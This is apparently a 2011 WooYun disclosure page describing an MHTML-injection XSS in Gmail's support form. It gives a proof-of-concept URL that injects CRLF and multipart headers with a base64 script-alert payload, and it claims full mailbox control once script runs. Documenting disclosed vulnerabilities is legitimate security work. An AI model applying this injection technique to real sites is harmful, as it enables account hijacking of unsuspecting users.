当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01474

漏洞标题:Gmail Xss漏洞可以导致用户被劫持

相关厂商:Google

漏洞作者: 路人甲

提交时间:2011-03-03 13:44

修复时间:2011-03-03 13:47

公开时间:2011-03-03 13:47

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-03-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-03-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Google最近悄悄修复了Gmail中存在一个严重的xss问题,可能导致劫持用户的账户

详细说明:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="zh-Hans">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.external.pageT?window.external.pageT:-1;pageStartTime=new Date().getTime();</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>与我们联系 - Gmail帮助</title>
<meta name="google-site-verification"
content="l0nCskQHeO/C11y6qeq7ngDGZ0QVdN1hX7F4SGj3PHg=" />
<link rel="icon" href="//www.google.com/favicon.ico" />
<link rel="stylesheet" type="text/css" href="http://mail.google.com/support/bin/resource/all.css?v=261_7" />
<script type="text/javascript">
var internal = 0;
var hc_protocol = "http://";
var hc_page_info = "request";
var country = 'CN';
var countryGroup = 'JAPAC';
var autoExpand = '';
var global_error_general = "很抱歉,我们无法提交您的信息。请重试。";
var hc_urchin = "UA-18500-28";
var global_hc_bookmark = new Array("add","remove","toggle");
global_hc_bookmark.add = new Array();
global_hc_bookmark.remove = new Array();
global_hc_bookmark.toggle = new Array();
global_hc_bookmark["add"].url = "";


问题存在于

var hc_page_info = "request";


的可控,满足mhtml漏洞的利用条件

http://mail.google.com/support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x!x


成功执行javascript之后,即可对gmail邮箱执行任何操作,之前已经有相应的一些case披露

 WooYun: GOOGLE BOOK MHTML协议注入型XSS漏洞 


漏洞证明:


<

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2011-03-03 14:36 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    鼎力膜拜!

  2. 2011-03-04 11:11 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    那个弹计算器的呢,一起发了吧!

  3. 2011-03-04 17:26 | piao2010 ( 路人 | Rank:4 漏洞数:2 | 打杂的。)

    mhtml的漏洞现在遍地开花啊。

  4. 2013-06-15 00:03 | 噬魂 ( 普通白帽子 | Rank:141 漏洞数:37 | 08安全团队)

    大牛,膜拜下